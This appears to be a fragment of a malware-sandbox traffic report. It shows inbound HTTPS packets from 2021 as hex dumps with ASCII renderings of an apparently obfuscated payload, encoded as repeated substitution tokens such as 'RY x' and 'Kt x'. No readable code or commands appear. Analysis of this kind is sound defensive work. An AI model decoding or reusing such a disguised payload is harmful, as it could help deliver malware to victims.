2021-10-29 18:50:19 UTC	2695	IN	Data Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
2021-10-29 18:50:19 UTC	2696	IN	Data Raw: 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2698	IN	Data Raw: 20 78 20 4f 4f 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 78 4f 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 52 20 78 20 74 59 20 78 20 4f 4f 6f 20 78 20 4b 74 20 78 20 59 52 20 78 20 74 4f 20 78 20 4f 78 51 20 78 20 4b 74 20 78 20 59 59 20 78 20 59 78 20 78 20 4f 78 6f 20 78 20 4f 78 51 20 78 20 4f 78 51 20 78 20 74 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 78 20 78 20 74 74 20 78 20 6b 45 20 78 20 59 4b 20 78 20 6b 51 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 6b 51 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 6b 51 20 78 20 52 51 20 Data Ascii: x OOt x YK x Kt x YR x OxO x Oox x Kt x YR x OxO x OOQ x Kt x YR x tY x OOo x Kt x YR x tO x OxQ x Kt x YY x Yx x Oxo x OxQ x OxQ x tK x kk x RY x RY x RY x RY x RY x RY x RY x RY x Yx x tt x kE x YK x kQ x RQ x OxE x OOQ x kQ x RQ x OxE x OOQ x kQ x RQ
2021-10-29 18:50:19 UTC	2699	IN	Data Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6b 20 78 20 4b 51 20 78 20 59 74 20 78 20 4f 78 6f 20 78 20 6b 74 20 78 20 74 78 20 78 20 51 78 20 78 20 4f 6f 6f 20 78 20 4f 78 52 20 78 20 74 78 20 78 20 4f 6f 78 20 78 20 51 78 20 78 20 59 52 20 78 20 4f 4f 59 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 52 20 78 20 4b 74 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kk x KQ x Yt x Oxo x kt x tx x Qx x Ooo x OxR x tx x Oox x Qx x YR x OOY x OOk x RY x Kt x YR x Kt x RY x Kt x Y
2021-10-29 18:50:19 UTC	2700	IN	Data Raw: 20 4f 78 59 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6b 20 78 20 6b 52 20 78 20 6b 52 20 78 20 59 74 20 78 20 74 6b 20 78 20 6b 52 20 78 20 6b 52 20 78 20 59 74 20 78 20 74 6b 20 78 20 6b 52 20 78 20 6b 52 20 78 20 59 74 20 78 20 52 Data Ascii: OxY x kO x kQ x RQ x OxE x OOQ x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x tk x kR x kR x Yt x tk x kR x kR x Yt x tk x kR x kR x Yt x R
2021-10-29 18:50:19 UTC	2702	IN	Data Raw: 78 20 78 20 6b 59 20 78 20 74 6b 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 4f 6f 78 20 78 20 51 74 20 78 20 4f 4f 6b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4f 4f 6b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 6b 4f 20 78 20 4b 6b 20 78 20 4f 4f 51 20 78 20 51 74 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 4f 4f 6f 20 78 20 52 6b 20 78 20 51 51 20 78 20 59 4f 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4f 6f 6f 20 78 20 4f 4f 59 20 78 20 59 59 20 78 20 74 51 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4f 4f 4b 20 78 20 59 4b 20 78 Data Ascii: x x kY x tk x RR x RY x RY x RY x RY x RY x RY x RY x RY x OOo x OxQ x Oox x Qt x OOk x kY x OOR x tR x OOk x kY x OOR x tR x OxE x kK x kO x Kk x OOQ x Qt x tQ x OxR x OOo x Rk x QQ x YO x OOK x kk x tk x Ooo x Ooo x OOY x YY x tQ x KE x OOk x OOK x YK x
2021-10-29 18:50:19 UTC	2703	IN	Data Raw: 20 78 20 4f 78 59 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 51 51 20 78 20 59 59 20 78 20 4b 45 20 78 20 52 6b 20 78 20 6b 78 20 78 20 59 59 20 78 20 4b 45 20 78 20 52 6b 20 78 20 6b 78 20 78 20 52 59 20 78 20 74 45 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 78 51 20 78 20 4f 4f 59 20 78 20 4f 6f 4f 20 78 20 74 4b 20 78 20 6b 52 20 78 20 51 6b 20 78 20 6b 52 20 78 20 6b 59 20 78 20 74 59 20 78 20 74 4b 20 78 20 6b 59 20 78 20 51 6b 20 78 20 51 78 20 78 20 4f 4f 45 20 78 20 4f 78 6b 20 78 20 52 74 20 78 20 59 4b 20 78 20 4f 4f 59 20 78 20 4f 78 4f 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 4f 45 20 78 20 51 78 20 78 20 4b 74 20 78 20 59 52 20 78 20 Data Ascii: x OxY x OOO x RY x RY x RY x RY x Oxk x OxQ x kR x QQ x YY x KE x Rk x kx x YY x KE x Rk x kx x RY x tE x RQ x RY x OxQ x OOY x OoO x tK x kR x Qk x kR x kY x tY x tK x kY x Qk x Qx x OOE x Oxk x Rt x YK x OOY x OxO x kO x Kt x YR x OOE x Qx x Kt x YR x
2021-10-29 18:50:19 UTC	2705	IN	Data Raw: 20 4f 78 6b 20 78 20 6b 74 20 78 20 74 6b 20 78 20 51 51 20 78 20 4f 78 74 20 78 20 74 78 20 78 20 59 74 20 78 20 51 74 20 78 20 4f 78 74 20 78 20 74 78 20 78 20 59 74 20 78 20 51 74 20 78 20 4f 78 74 20 78 20 74 78 20 78 20 59 74 20 78 20 51 74 20 78 20 4f 4f 6f 20 78 20 74 6f 20 78 20 52 52 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 59 74 20 78 20 59 78 20 78 20 59 59 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 78 51 20 78 20 6b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 4f 78 4f 20 78 20 6b 4b 20 78 20 4b 74 20 78 20 59 52 20 78 20 51 74 20 78 20 6b 45 20 78 20 4b 74 20 78 20 59 52 20 78 20 6b 74 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 52 20 78 20 6b 74 20 78 20 74 51 20 78 20 4b 74 20 78 20 59 52 20 78 20 74 59 20 78 20 74 59 20 78 20 4b 74 20 78 20 59 Data Ascii: Oxk x kt x tk x QQ x Oxt x tx x Yt x Qt x Oxt x tx x Yt x Qt x Oxt x tx x Yt x Qt x OOo x to x RR x OxR x Kt x Yt x Yx x YY x Kt x YR x OxQ x kt x Kt x YR x OxO x kK x Kt x YR x Qt x kE x Kt x YR x kt x kO x Kt x YR x kt x tQ x Kt x YR x tY x tY x Kt x Y
2021-10-29 18:50:19 UTC	2706	IN	Data Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2707	IN	Data Raw: 20 52 74 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 4f 78 52 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 59 6f 20 78 20 74 74 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 6b 51 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 Data Ascii: Rt x OxE x Kt x OOk x OxR x OOQ x OOY x tY x Rt x kO x OOY x tK x OxY x kO x OOY x tK x OxY x kO x OOY x tK x OxY x kO x OOY x tK x OxY x kO x Yo x tt x Rt x OxE x kQ x RQ x OxE x OOQ x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2711	IN	Data Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 4f 4f 74 20 78 20 4f 4f 4f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x OOo x OOx x tk x OxR x Kt x Yt x OoO x YY x Kt x Yt x OoO x YY x Kt x Yt x OoO x YY x OOt x OOO x tK x OOo x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x
2021-10-29 18:50:19 UTC	2715	IN	Data Raw: 6b 78 20 78 20 4f 78 52 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 45 20 78 20 4f 78 4b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4f 4f 52 20 78 20 52 6b 20 78 20 52 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 4f 45 20 78 20 59 78 20 78 20 4f 78 52 20 78 20 4f 78 6b 20 78 20 59 45 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 4f 6f 78 20 78 20 51 74 20 78 20 4f 4f 6b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 52 20 78 20 52 74 20 78 20 4f 4f 51 20 78 20 4f 4f Data Ascii: kx x OxR x tO x Oox x tE x OxK x OOO x YK x OOR x Rk x Rt x Kt x Yt x OOE x Yx x OxR x Oxk x YE x Qx x RY x RY x RY x RY x RY x RY x RY x RY x OOo x OxQ x Oox x Qt x OOk x kY x OOR x tR x OOK x kk x tk x Ooo x KE x kx x OxR x Yo x OOY x tR x Rt x OOQ x OO
2021-10-29 18:50:19 UTC	2716	IN	Data Raw: 78 20 52 51 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 52 51 20 78 20 52 6b 20 78 20 52 52 20 78 20 52 59 20 78 20 52 51 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 4f 78 78 20 78 20 4f 4f 78 20 78 20 6b 6f 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 74 6f 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 6b 59 20 78 20 74 59 20 78 20 4f 78 4b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 Data Ascii: x RQ x Rt x OxE x OOQ x RQ x Rk x RR x RY x RQ x Rt x OxE x OOQ x Oxx x OOx x ko x Kk x kO x to x OxK x RY x kY x tY x OxK x OxE x RY x RY x RY x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x
2021-10-29 18:50:19 UTC	2721	IN	Data Raw: 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4f 4f 78 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 6b 51 20 78 20 4f 6f 4f 20 78 20 4f 4f 4f 20 78 20 4f 6f 78 20 78 20 4f 4f 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 6f 20 78 20 4f 4f 52 20 78 20 6b 78 20 78 20 52 51 20 78 20 4b 6b 20 78 20 Data Ascii: x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x OOx x OxQ x kR x kQ x OoO x OOO x Oox x OOK x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x Yo x OOR x kx x RQ x Kk x
2021-10-29 18:50:19 UTC	2725	IN	Data Raw: 4f 6f 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 6b 4f 20 78 20 4b 6b 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 Data Ascii: Oox x Qt x OxE x kK x kO x Kk x OOK x kk x tk x Ooo x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOK x kk x tk x Ooo x OxE x kK x
2021-10-29 18:50:19 UTC	2729	IN	Data Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 74 20 78 20 59 52 20 78 20 4b 45 20 78 20 4f 4f 74 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f Data Ascii: Y x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x Yt x YR x KE x OOt x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO
2021-10-29 18:50:19 UTC	2733	IN	Data Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 74 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 52 59 20 78 20 Data Ascii: RY x RY x RY x RY x RY x OxE x RY x Rt x RY x RY x tE x Rt x RY x RY x RY x Rt x RY x OxE x tE x RY x RY x OOQ x tt x Rk x RY x RY x RY x RY x RY x Kt x OOQ x RY x RY x Kt x OOQ x RY x RY x RY x kx x Kt x Kt x RY x kx x YR x RY x RY x RY x Rk x Kt x RY x
2021-10-29 18:50:19 UTC	2737	IN	Data Raw: 6b 51 20 78 20 4f 78 78 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 74 51 20 78 20 74 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 59 6f 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 4b 45 20 78 20 6b 51 20 78 20 6b 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 59 45 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 4b 45 20 78 20 6b 51 20 78 20 6b 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 59 45 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 4b 45 20 78 20 Data Ascii: kQ x Oxx x OOY x RY x kx x tQ x tx x Qt x OxE x Rk x Yo x OxK x kt x OOO x RY x KE x kQ x kR x OOE x RY x kx x OxQ x tx x Qt x OxE x Rk x YE x OxK x kt x OOO x RY x KE x kQ x kR x OOE x RY x kx x OxQ x tx x Qt x OxE x Rk x YE x OxK x kt x OOO x RY x KE x
2021-10-29 18:50:19 UTC	2741	IN	Data Raw: 78 59 20 78 20 74 6f 20 78 20 52 51 20 78 20 6b 78 20 78 20 4f 4f 6f 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 74 6f 20 78 20 4f 4f 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 74 6f 20 78 20 6b 6b 20 78 20 4f 4f 78 20 78 20 4b 74 20 78 20 4f 4f 6f 20 78 20 4f 78 59 20 78 20 4f 78 59 20 78 20 52 74 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 74 20 78 20 4f 78 74 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 78 52 20 78 20 74 45 20 78 20 6b 6b 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4f 4f 4f 20 78 20 4f 6f 4f 20 78 20 74 78 20 78 20 59 52 20 78 20 4b 74 20 78 20 59 45 20 78 20 51 78 20 78 20 51 74 20 78 20 74 4b 20 78 20 4f 78 6f 20 78 20 4b 45 20 78 20 Data Ascii: xY x to x RQ x kx x OOo x Rk x kO x kY x to x OOo x OxE x RY x RY x RY x Rt x Yx x OxK x to x kk x OOx x Kt x OOo x OxY x OxY x Rt x Kt x YK x tt x Oxt x Oxo x Kt x KE x OxR x tE x kk x Ooo x Kt x OOO x OoO x tx x YR x Kt x YE x Qx x Qt x tK x Oxo x KE x
2021-10-29 18:50:19 UTC	2745	IN	Data Raw: 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 74 74 20 78 20 6b 6b 20 78 20 6b 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 6f 20 78 20 59 59 20 78 20 6b 78 20 78 20 6b 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 59 59 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 59 20 78 20 4b 45 20 78 20 4b 6b 20 78 20 4f 78 45 20 78 20 6b 78 20 78 20 59 74 20 78 20 59 4b 20 78 20 51 78 20 78 20 4f 78 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 51 6b 20 78 20 52 51 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4f 6f 4f 20 78 20 4f 4f Data Ascii: t x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x OOk x tt x kk x kY x Kt x Kt x Kt x Kt x Kt x Kt x Kt x OOo x YY x kx x kk x Kt x KQ x Oxx x YY x OOQ x Kt x YY 